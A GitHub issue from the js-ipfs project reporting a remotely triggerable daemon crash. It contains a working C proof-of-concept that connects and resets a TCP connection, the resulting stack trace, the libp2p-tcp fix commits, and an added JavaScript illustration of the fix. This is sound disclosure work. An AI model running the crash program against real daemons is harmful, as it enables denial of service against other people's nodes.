This repository has been archived by the owner on Feb 12, 2024. It is now read-only.

Daemon can be crashed by remote user #1447

Closed
0xall opened this issue Jul 17, 2018 · 1 comment · Fixed by libp2p/js-libp2p-tcp#96
Labels
exp/wizard Extensive knowledge (implications, ramifications) required kind/bug A bug in existing code (including security flaws) P1 High: Likely tackled by core team if no one steps up

0xall commented Jul 17, 2018

  • Version: 0.30.0
  • Platform: Darwin (Mac OS) High Sierra 10.13.5
  • Subsystem: libp2p

Type: Bug

Severity:

Description:

The program below, written in C, crashes a remote js-ipfs daemon. It just connects to
a daemon (over TCP) and immediately closes the connection with the RST (reset) flag. It needs the IP address and port of the remote daemon.

Steps to reproduce the error:

  • Copy and compile the C code below. (I think it can be compiled only on Linux or Darwin.)
  • Run it.
  • Input the IP address and port of the remote daemon to crash.

#include <stdio.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <string.h>

int main(int argc, char const *argv[])
{
    int sock = 0;
    struct sockaddr_in serv_addr;
    char ipStr[1024];
    int port;

    printf("Input IP Address : ");
    scanf("%1023s", ipStr); /* bound the read to the 1024-byte buffer */

    printf("Input port : ");
    scanf("%d", &port);

    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    {
        printf("\n Socket creation error \n");
        return -1;
    }
  
    memset(&serv_addr, 0, sizeof(serv_addr)); /* zero bytes, not the character '0' */
  
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(port);
      
    if(inet_pton(AF_INET, ipStr, &serv_addr.sin_addr)<=0) 
    {
        printf("\nInvalid address/ Address not supported \n");
        return -1;
    }
  
    if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0)
    {
        printf("\nConnection Failed \n");
        return -1;
    }

    struct linger sl;
    sl.l_onoff = 1;
    sl.l_linger = 0;
    setsockopt(sock, SOL_SOCKET, SO_LINGER, &sl, sizeof(sl));

    printf("sent\n");
    shutdown(sock, 1);
    return 0;
}

I ran the program with

Input IP Address : 127.0.0.1
Input port : 4002
sent

and the daemon crashed with an error like the one below

/usr/local/Cellar/node@8/8.11.1/lib/node_modules/ipfs/node_modules/libp2p-tcp/node_modules/multiaddr/src/convert.js:72
  if (!ipaddr.isValid()) throw new Error('invalid ip address')
                         ^

Error: invalid ip address
    at ip2buf (/usr/local/Cellar/node@8/8.11.1/lib/node_modules/ipfs/node_modules/libp2p-tcp/node_modules/multiaddr/src/convert.js:72:32)
    at Function.convertToBuffer [as toBuffer] (/usr/local/Cellar/node@8/8.11.1/lib/node_modules/ipfs/node_modules/libp2p-tcp/node_modules/multiaddr/src/convert.js:49:14)
    at /usr/local/Cellar/node@8/8.11.1/lib/node_modules/ipfs/node_modules/libp2p-tcp/node_modules/multiaddr/src/codec.js:85:35
    at arrayMap (/usr/local/Cellar/node@8/8.11.1/lib/node_modules/ipfs/node_modules/lodash.map/index.js:140:21)
    at map (/usr/local/Cellar/node@8/8.11.1/lib/node_modules/ipfs/node_modules/lodash.map/index.js:1836:10)
    at stringTuplesToTuples (/usr/local/Cellar/node@8/8.11.1/lib/node_modules/ipfs/node_modules/libp2p-tcp/node_modules/multiaddr/src/codec.js:79:10)
    at stringToBuffer (/usr/local/Cellar/node@8/8.11.1/lib/node_modules/ipfs/node_modules/libp2p-tcp/node_modules/multiaddr/src/codec.js:171:13)
    at Object.fromString (/usr/local/Cellar/node@8/8.11.1/lib/node_modules/ipfs/node_modules/libp2p-tcp/node_modules/multiaddr/src/codec.js:178:10)
    at ClassIsWrapper.withIs.proto.className (/usr/local/Cellar/node@8/8.11.1/lib/node_modules/ipfs/node_modules/libp2p-tcp/node_modules/multiaddr/src/index.js:40:25)
    at new Multiaddr (/usr/local/Cellar/node@8/8.11.1/lib/node_modules/ipfs/node_modules/class-is/index.js:40:33)
@alanshaw alanshaw added kind/bug A bug in existing code (including security flaws) exp/wizard Extensive knowledge (implications, ramifications) required status/ready Ready to be worked P1 High: Likely tackled by core team if no one steps up labels Jul 17, 2018
TomCoded added a commit to TomCoded/js-libp2p-tcp that referenced this issue Jul 23, 2018
Per the nodeJS documentation, a Net socket.remoteAddress value may
be undefined if the socket is destroyed, as by a client disconnect.
A multiaddr cannot be created for an invalid IP address (such as
the undefined remote address of a destroyed socket). Currently
the attempt results in a crash that can be triggered remotely. This
commit terminates processing of a destroyed socket before multiaddr
causes the crash.

fixes: libp2p#93
fixes: ipfs/js-ipfs#1447
@alanshaw alanshaw added status/in-progress In progress and removed status/ready Ready to be worked labels Jul 29, 2018
TomCoded added a commit to TomCoded/js-libp2p-tcp that referenced this issue Jul 31, 2018
Per the nodeJS documentation, a Net socket.remoteAddress value may
be undefined if the socket is destroyed, as by a client disconnect.
A multiaddr cannot be created for an invalid IP address (such as
the undefined remote address of a destroyed socket). Currently
the attempt results in a crash that can be triggered remotely. This
commit catches the exception in get-multiaddr and returns an
undefined value to listener rather than throwing an exception when
trying to process defective or destroyed socket data. Listener then
terminates processing of the incoming p2p connections that generate
this error condition.

fixes: libp2p#93
fixes: ipfs/js-ipfs#1447
jacobheun pushed a commit to libp2p/js-libp2p-tcp that referenced this issue Jul 31, 2018
Per the nodeJS documentation, a Net socket.remoteAddress value may
be undefined if the socket is destroyed, as by a client disconnect.
A multiaddr cannot be created for an invalid IP address (such as
the undefined remote address of a destroyed socket). Currently
the attempt results in a crash that can be triggered remotely. This
commit catches the exception in get-multiaddr and returns an
undefined value to listener rather than throwing an exception when
trying to process defective or destroyed socket data. Listener then
terminates processing of the incoming p2p connections that generate
this error condition.

fixes: #93
fixes: ipfs/js-ipfs#1447
@ghost ghost removed the status/in-progress In progress label Jul 31, 2018
@jacobheun

libp2p-tcp 0.12.1 has been released and should resolve the crash.
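
The failure mode and the fix described in the commit messages above, as an added example that is not code from js-libp2p-tcp or multiaddr. `toMultiaddrString` is a simplified stand-in for multiaddr's validation, the sockets are constructed objects, and all function names are hypothetical; destroying the socket in the listener is an assumption about what "terminates processing" means.

```javascript
// Stand-in for multiaddr's address validation (hypothetical helper, not the
// multiaddr package): throws 'invalid ip address' unless given an IP literal.
function toMultiaddrString (address, port) {
  const v4 = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(String(address))
  const isV4 = v4 !== null && v4.slice(1).every(o => Number(o) <= 255)
  const isV6 = typeof address === 'string' && /^[0-9a-fA-F:.]+$/.test(address) && address.includes(':')
  if (!isV4 && !isV6) throw new Error('invalid ip address')
  return `/${isV4 ? 'ip4' : 'ip6'}/${address}/tcp/${port}`
}

// Before: socket.remoteAddress is trusted, so an early reset becomes an uncaught throw.
function getMultiaddrUnsafe (socket) {
  return toMultiaddrString(socket.remoteAddress, socket.remotePort)
}

// After (the approach the commit message describes): catch the failure and
// return undefined so the caller can drop this one connection.
function getMultiaddrSafe (socket) {
  try {
    return toMultiaddrString(socket.remoteAddress, socket.remotePort)
  } catch (err) {
    return undefined
  }
}

// Listener-side handling: with no usable remote address the socket is
// destroyed (assumed) and never reaches the connection handler.
function onConnection (socket, accepted) {
  const addr = getMultiaddrSafe(socket)
  if (addr === undefined) {
    socket.destroy()
    return false
  }
  accepted.push(addr)
  return true
}

// Constructed stand-in for net.Socket; a reset peer has remoteAddress undefined.
const fakeSocket = (remoteAddress, remotePort) => ({ remoteAddress, remotePort, destroyed: false, destroy () { this.destroyed = true } })
function demo () {
  const accepted = []
  const reset = fakeSocket(undefined, undefined)
  const results = [onConnection(fakeSocket('127.0.0.1', 51234), accepted), onConnection(reset, accepted)]
  let unsafeThrew = false
  try { getMultiaddrUnsafe(reset) } catch (err) { unsafeThrew = err.message === 'invalid ip address' }
  return { results, accepted, resetDestroyed: reset.destroyed, unsafeThrew }
}

console.log(demo())
```
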
